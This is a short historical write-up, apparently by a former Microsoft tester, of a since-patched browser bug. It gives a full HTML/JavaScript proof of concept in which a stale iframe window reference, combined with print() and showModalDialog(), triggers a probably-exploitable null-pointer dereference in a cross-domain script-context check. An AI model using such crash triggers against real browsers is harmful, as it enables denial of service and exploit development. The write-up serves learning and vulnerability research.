Timing was the critical element here. By saving a reference to window inside an iFrame, immediately navigating the iFrame away, and then calling a method on the saved reference inside a try/catch, the browser landed in a state where the script context had been torn down but the window object was still partially accessible. The result was a probably-exploitable null-pointer dereference in the cross-domain script context checker.
<!-- iframe.html (loaded inside the iFrame) -->
<script>
function crashMe()
{
pWindow = window;
location.href = "about:blank";
window.print();
try
{
pWindow.showModalDialog();
}
catch (e){}
}
</script>
<input type="button" onmouseover="crashMe()" value="mouseOver me to Crash!"><!-- parent page -->
<iframe src="iframe.html" name="iFrame" width="400" height="80"></iframe>The window.print() call opens the print dialog, which gives the navigation to about:blank enough time to invalidate the document context. When pWindow.showModalDialog() is then called on the stale reference, the engine enters ScriptSite::CheckCrossDomainScriptContext with a null script context pointer and dereferences it. The try/catch is essential — without it the crash takes a different, non-reproducible path. Exploitability was rated PROBABLY_EXPLOITABLE.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.